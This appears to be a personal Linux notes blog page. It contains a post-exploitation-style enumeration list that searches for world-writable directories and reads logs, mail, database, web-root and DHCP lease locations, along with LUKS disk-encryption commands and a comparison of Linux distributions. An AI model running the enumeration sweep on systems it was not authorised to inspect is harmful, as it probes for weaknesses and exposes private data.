find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null   # world-writeable & executable folders
ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases
ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/
Set a UUID for the LUKS partition: cryptsetup luksUUID --uuid "" /dev/sdxX
Open a LUKS device: cryptsetup luksOpen [device] [name]
Show device-mapper info: dmsetup info
Quickly create a key: dd if=/dev/urandom of=$HOME/keyfile bs=32 count=1 && chmod 600 $HOME/keyfile
Add a key to a device : cryptsetup luksAddKey [device] ~/keyfile
Remove a device key: cryptsetup luksRemoveKey [device]
Close the volume group: lvchange -a n My_vg_crypt
Close the LUKS device: cryptsetup -v luksClose My_Crypt (the mapper name, e.g. luks-bxxaccxx-xxxd-4f3a-xxxx-16965ea084d1)
Well why you should stick with it :
- to install it quickly
- to get frequent system and package updates
- for a stable environment
- to get used to the most widely used ones ;-)
Some say you could work with other distributions.
It's up to you.
1) Fedora
Based on Red Hat, it is very stable, well documented and easy to install. It comes with SELinux, which is very good for security.
2) openSUSE
A distribution oriented towards developers and sysadmins,
but easy to use and easy to install. SELinux too.
3) Ubuntu
It is for beginners, oriented towards people who need a lot of graphical apps. Stable too and easy to install.
4) Arch Linux
Why Arch for workstations?
Well, it's not for beginners.
Once you know what you are doing, no problem: it's a great distribution, very well documented.
For workstations you should go for the linux-lts kernel.
Use LVM and make snapshots.
5) Debian
Debian is stable but some package updates are slow to arrive. It's a great distribution though; it's great for servers.
Hi all and Welcome, please feel free to post any comment but be respectful please!
The purpose of this blog is to help me remember commands and great articles I use for Linux and dev work.
If an article belongs to you, please let me know and I will add your name and a link to your website.
Thanks
Have a nice day!